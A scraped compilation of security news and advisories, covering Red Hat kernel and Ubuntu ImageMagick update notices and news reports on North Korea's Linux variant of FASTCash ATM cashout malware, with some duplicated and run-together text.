2.  **Cyber Criminals Selling Bitcoin ATM Malware on Dark Web**
3.  **ATM bombing suspect blew himself up while filming tutorial**
4.  **Card Skimmers and ATMs Used to Drain EBT Accounts in SoCal**
5.  **Prilex ATM Malware Modified to Clone Chip-and-Pin Payment Cards**

North Korean Hackers Deploy Linux FASTCash Malware for ATM Cashouts

Red Hat Security Advisory 2024-8158-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8158.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:8158-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8158  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8158-03

Red Hat Security Advisory 2024-8157-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8157.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8157-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8157  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8157-03

The thieves modify transaction messages to initiate unauthorized withdrawals, even when there are insufficient funds.

Source: Panther Media GmbH via Alamy Stock Photo

North Korean threat actors are using a Linux variant from a malware family known as "FASTCash" to conduct a financially motivated cyber campaign.

FASTCash is a payment switch malware, first documented by the US government in October 2018 when it was being used by North Korean adversaries in an ATM scheme targeting banks in Africa and Asia.

Since that time, there have been two significant developments within the campaign. The first is its capability to conduct the scheme against banks hosting their switch application on Windows Server, and the second is its expansion of the campaign to target interbank payment processors.

Prior versions of the malware targeted systems running Microsoft Windows and IBM AIX, though the latest findings of the malware now indicate that it is designed to infiltrated Linux systems.

The malware modifies ISO 8583 transaction messages used in debit and credit card transactions to initiate unauthorized withdrawals, even managing to manipulate declined transactions due to insufficient funds, then approve them to withdraw money in Turkish currency ranging from 12,000 to 30,000 lira ($350 to $875).

"The process injection technique employed to intercept the transaction messages should be flagged by any commercial \[endpoint detection and response\] or opensource Linux agent with the appropriate configuration to detect usage of the ptrace system call," noted the researchers in the report.

The researchers also highlight Cybersecurity and Infrastructure Security Agency (CISA) recommendations of implementing chip and PIN requirements for debit cards, requiring and verifying message authentication codes on issue financial request response messages, and performing authorization response cryptogram validation for chip and PIN transactions to prevent exploitation attempts.

**About the Author**

North Korea Hackers Get Cash Fast in Linux Cyber Heists

North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign.
The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

North Korean threat actors have been observed using a Linux variant of a known malware family called **FASTCash** to steal funds as part of a financially-motivated campaign.

The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

FASTCash was first documented by the U.S. government in October 2018 as used by adversaries linked to North Korea in connection with an ATM cashout scheme targeting banks in Africa and Asia since at least late 2016.

"FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions," the agencies noted at the time.

"In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries."

While prior FASTCash artifacts have systems running Microsoft Windows (including one spotted as recently as last month) and IBM AIX, the latest findings show that samples designed for infiltrating Linux systems were first submitted to the VirusTotal platform in mid-June 2023.

The malware takes the form of a shared object ("libMyFc.so") that's compiled for Ubuntu Linux 20.04. It's designed to intercept and modify ISO 8583 transaction messages used for debit and credit card processing in order to initiate unauthorized fund withdrawals.

Specifically, it entails manipulating declined (magnetic swipe) transaction messages due to insufficient funds for a predefined list of cardholder account numbers and approving them to withdraw a random amount of funds in Turkish Lira.

The funds withdrawn per fraudulent transaction range from 12,000 to 30,000 Lira ($350 to $875), mirroring a Windows FASTCash artifact ("switch.dll") previously detailed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

"\[The\] discovery of the Linux variant further emphasizes the need for adequate detection capabilities which are often lacking in Linux server environments," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists

Ubuntu Security Notice 7068-1 - It was discovered that ImageMagick incorrectly handled certain malformed image files. If a user or automated system using ImageMagick were tricked into processing a specially crafted file, an attacker could exploit this to cause a denial of service or affect the reliability of the system. The vulnerabilities included memory leaks, buffer overflows, and improper handling of pixel data.

    ==========================================================================Ubuntu Security Notice USN-7068-1October 15, 2024imagemagick vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in ImageMagick.Software Description:- imagemagick: Image manipulation programs and libraryDetails:It was discovered that ImageMagick incorrectly handled certainmalformed image files. If a user or automated system using ImageMagickwere tricked into processing a specially crafted file, an attacker couldexploit this to cause a denial of service or affect the reliability of thesystem. The vulnerabilities included memory leaks, buffer overflows, andimproper handling of pixel data.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS  imagemagick-6.q16               8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libimage-magick-perl            8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libimage-magick-q16-perl        8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagick++-6.q16-5v5           8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagickcore-6-headers         8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagickcore-6.q16-2           8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagickcore-6.q16-2-extra     8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagickcore-6.q16-dev         8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu Pro  libmagickwand-6.q16-2           8:6.8.9.9-7ubuntu5.16+esm11                                  Available with Ubuntu ProUbuntu 14.04 LTS  imagemagick                     8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagick++-dev                 8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagick++5                    8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagickcore-dev               8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagickcore5                  8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagickcore5-extra            8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagickwand-dev               8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  libmagickwand5                  8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu Pro  perlmagick                      8:6.7.7.10-6ubuntu3.13+esm11                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-7068-1 <https://ubuntu.com/security/notices/USN-7068-1>  CVE-2019-7397, CVE-2019-7398, CVE-2019-9956, CVE-2020-19667,  CVE-2020-25664, CVE-2020-25665, CVE-2020-25666, CVE-2020-25674,  CVE-2020-25676, CVE-2020-27560, CVE-2020-27750, CVE-2020-27753,  CVE-2020-27754, CVE-2020-27755, CVE-2020-27758, CVE-2020-27759,  CVE-2020-27760, CVE-2020-27761, CVE-2020-27762, CVE-2020-27763,  CVE-2020-27764, CVE-2020-27765, CVE-2020-27766, CVE-2020-27767,  CVE-2020-27768, CVE-2020-27769, CVE-2020-27770, CVE-2020-27771,  CVE-2020-27772, CVE-2020-27773, CVE-2020-27774, CVE-2020-27775,  CVE-2020-27776

Tag

#ibm